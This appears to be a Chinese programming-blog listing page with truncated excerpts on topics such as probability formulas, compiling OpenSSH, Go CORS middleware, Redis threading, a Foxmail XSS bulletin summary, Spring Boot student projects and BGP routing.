概率论与数理统计核心知识点与公式总结(就业版)
文章目录 概率论与数理统计核心知识点与公式总结(附实际应用)一、概率论基础1.1 基本概念1.2 条件概率与独立性 二、随机变量及其分布2.0 随机变量2.0 分布函数(CDF)2.1 离散型随机变量2.2 连续型随机变量2.3 多维随机变量2.3.1 联…...
AF3 ProteinDataset类的_patch方法解读
AlphaFold3 protein_dataset模块 ProteinDataset 类 _patch 方法的主要目的是围绕锚点残基(anchor residues)裁剪蛋白质数据,提取一个局部补丁(patch)作为模型输入。 源代码: def _patch(self, data):"""Cut the data around the anchor residues."…...
openssh 10.0在debian、ubuntu编译安装 —— 筑梦之路
OpenSSH 10.0 发布:一场安全与未来兼顾的大升级 - Linux迷 OpenSSH: Release Notes sudo apt-get updatesudo apt install build-essential zlib1g-dev libssl-dev libpam0g-dev libselinux1-devwget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/opens…...
Go 跨域中间件实现指南:优雅解决 CORS 问题
在开发基于 Web 的 API 时,尤其是前后端分离项目,**跨域问题(CORS)**是前端开发人员经常遇到的“拦路虎”。本文将带你了解什么是跨域、如何在 Go 中优雅地实现一个跨域中间件,支持你自己的 HTTP 服务或框架如 net/htt…...
【数据结构_6】双向链表的实现
一、实现MyDLinkedList(双向链表) package LinkedList;public class MyDLinkedList {//首先我们要创建节点(因为双向链表和单向链表的节点不一样!!)static class Node{public String val;public Node prev…...
【双指针】专题:LeetCode 1089题解——复写零
复写零 一、题目链接二、题目三、算法原理1、先找到最后一个要复写的数——双指针算法1.5、处理一下边界情况2、“从后向前”完成复写操作 四、编写代码五、时间复杂度和空间复杂度 一、题目链接 复写零 二、题目 三、算法原理 解法:双指针算法 先根据“异地”操…...
Foxmail邮件客户端跨站脚本攻击漏洞(CNVD-2025-06036)技术分析
Foxmail邮件客户端跨站脚本攻击漏洞(CNVD-2025-06036)技术分析 漏洞背景 漏洞编号:CNVD-2025-06036 CVE编号:待分配 厂商:腾讯Foxmail 影响版本:Foxmail < 7.2.25 漏洞类型&#x…...
39.[前端开发-JavaScript高级]Day04-函数增强-argument-额外知识-对象增强
JavaScript函数的增强知识 1 函数属性和arguments 函数对象的属性 认识arguments arguments转Array 箭头函数不绑定arguments 函数的剩余(rest)参数 2 纯函数的理解和应用 理解JavaScript纯函数 副作用概念的理解 纯函数的案例 判断下面函数是否是纯…...
0x05.为什么 Redis 设计为单线程?6.0 版本为何引入多线程?
回答重点 单线程设计原因: Redis 的操作是基于内存的,其大多数操作的性能瓶颈主要不是 CPU 导致的使用单线程模型,代码简便的同时也减少了线程上下文切换带来的性能开销Redis 在单线程的情况下,使用 I/O 多路复用模型就可以提高 Redis 的 I/O 利用率了6.0 版本引入多线程的…...
CST1019.基于Spring Boot+Vue智能洗车管理系统
计算机/JAVA毕业设计 【CST1019.基于Spring BootVue智能洗车管理系统】 【项目介绍】 智能洗车管理系统,基于 Spring Boot Vue 实现,功能丰富、界面精美 【业务模块】 系统共有三类用户,分别是:管理员用户、普通用户、工人用户&…...
CST1018.基于Spring Boot+Vue滑雪场管理系统
计算机/JAVA毕业设计 【CST1018.基于Spring BootVue滑雪场管理系统】 【项目介绍】 滑雪场管理系统,基于 Spring Boot Vue 实现,功能丰富、界面精美 【业务模块】 系统共有两类用户,分别是管理员和普通用户,管理员负责维护后台数…...
剖析 Rust 与 C++:性能、安全及实践对比
1 性能对比:底层控制与运行时开销 1.1 C 的性能优势 C 给予开发者极高的底层控制能力,允许直接操作内存、使用指针进行精细的资源管理。这使得 C 在对性能要求极高的场景下,如游戏引擎开发、实时系统等,能够发挥出极致的性能。以…...
SDHC接口协议底层传输数据是安全的
SDHC(Secure Digital High Capacity)接口协议在底层数据传输过程中确实包含校验机制,以确保数据的完整性和可靠性。以下是关键点的详细说明: 物理层与数据链路层的校验机制 物理层(Electrical Layer)&…...
Gateway-网关-分布式服务部署
前言 什么是API⽹关 API⽹关(简称⽹关)也是⼀个服务, 通常是后端服务的唯⼀⼊⼝. 它的定义类似设计模式中的Facade模式(⻔⾯模式, 也称外观模式). 它就类似整个微服务架构的⻔⾯, 所有的外部客⼾端访问, 都需要经过它来进⾏调度和过滤. 常⻅⽹关实现 Spring Cloud Gateway&a…...
c++STL——string学习的模拟实现
文章目录 string的介绍学习的意义auto关键字和范围forstring中的常用接口构造和析构对string得容量进行操作string的访问迭代器(Iterators):运算符[ ]重载 string类的修改操作非成员函数 string的模拟实现不同平台下的实现注意事项模拟实现部分所有的模拟实现函数预…...
【寻找Linux的奥秘】第四章:基础开发工具(下)
请君浏览 前言1. 自动化构建1.1 背景1.2 基本语法1.3 make的运行原理1.4通用的makefile 2. 牛刀小试--Linux第一个小程序2.1 回车与换行2.2 行缓冲区2.3 倒计时小程序2.4 进度条小程序原理代码 3. 版本控制器git3.1 认识3.2 git的使用三板斧 3.3 其他 4. 调试器gdb/cgdb4.1 了解…...
RK3588上Linux系统编译C/C++ Demo时出现BUG:The C/CXX compiler identification is unknown
BUG的解决思路 BUG描述:解决方法:首先最重要的一步:第二步:正确设置gcc和g的路径方法一:使用本地系统中安装的 aarch64-linux-gnu-gcc 和 aarch64-linux-gnu-g方法二:下载使用官方指定的交叉编译工具方法三…...
记录一次/usr/bin/ld: 找不到 -lOpenSSL::SSL
1、cmake 报错内容如下: /usr/bin/ld: 找不到 -lOpenSSL::SSL /usr/bin/ld: 找不到 -lOpenSSL::Crypto2、一开始以为库没有正确安装 sudo yum install openssl-devel然后查看openssl 结果还是报错! 3、尝试卸载安装都不管用,网上搜了好多…...
[16届蓝桥杯 2025 c++省 B] 水质检测
思路:分类讨论,从左到右枚举,判断当前的河床和下一个河床的距离是第一行更近还是第二行更近还是都一样近,分成三类编写代码即可 #include<iostream> using namespace std; int main(){string s1,s2;cin>>s1>>…...
基于PySide6与pycatia的CATIA绘图比例智能调节工具开发全解析
引言:工程图纸自动化处理的技术革新 在机械设计领域,CATIA图纸的比例调整是高频且重复性极强的操作。传统手动调整方式效率低下且易出错。本文基于PySide6pycatia技术栈,提出一种支持智能比例匹配、实时视图控制、异常自处理的图纸批处理方案…...
四、Appium Inspector
一、介绍 Appium Inspector 是一个用于移动应用自动化测试的图形化工具,主要用于检查和交互应用的 UI 元素,帮助生成和调试自动化测试脚本。类似于浏览器的F12(开发者工具),Appium Inspector 的主要作用包括: 1.检查 UI 元素 …...
玩转Docker | 使用Docker部署MicroBin粘贴板
玩转Docker | 使用Docker部署MicroBin粘贴板 前言一、MicroBin介绍MicroBin 简介主要特点二、系统要求环境要求环境检查Docker版本检查检查操作系统版本三、部署MicroBin服务下载镜像创建容器检查容器状态检查服务端口安全设置四、访问MicroBin服务访问MicroBin首页登录管理后台…...
BGP分解实验·23——BGP选路原则之路由器标识
在选路原则需要用到Router-ID做选路决策时,其对等体Router-ID较小的路由将被优选;其中,当路由被反射时,包含起源器ID属性时,该属性将代替router-id做比较。 实验拓扑如下: 实验通过调整路由器R1和R2的rout…...
MQTT:单片机中MQTTClient-C移植定时器功能
接下来我们完善MQTTTimer.c和MQTTTimer.h两个功能 MQTTTimer.h void TimerInit(Timer* timer); 功能:此函数用于对 Timer 结构体进行初始化。在 MQTT 客户端里,定时器被用于追踪各种操作的时间,像连接超时、心跳包发送间隔等。初始化操作会…...
可拖动的关系图谱原型案例
关系图谱是一种以图结构形式组织和呈现实体间复杂关联关系的可视化数据模型。它通过节点和线构建多维度网络,能直观揭示隐藏的群体特征和传播路径。在社交网络分析、智能推荐系统、知识图谱构建等领域广泛应用。 软件版本:Axure RP 9 作品类型…...
CST1016.基于Spring Boot+Vue高校竞赛管理系统
计算机/JAVA毕业设计 【CST1016.基于Spring BootVue高校竞赛管理系统】 【项目介绍】 高校竞赛管理系统,基于 DeepSeek Spring AI Spring Boot Vue 实现,功能丰富、界面精美 【业务模块】 系统共有两类用户,分别是学生用户和管理员用户&a…...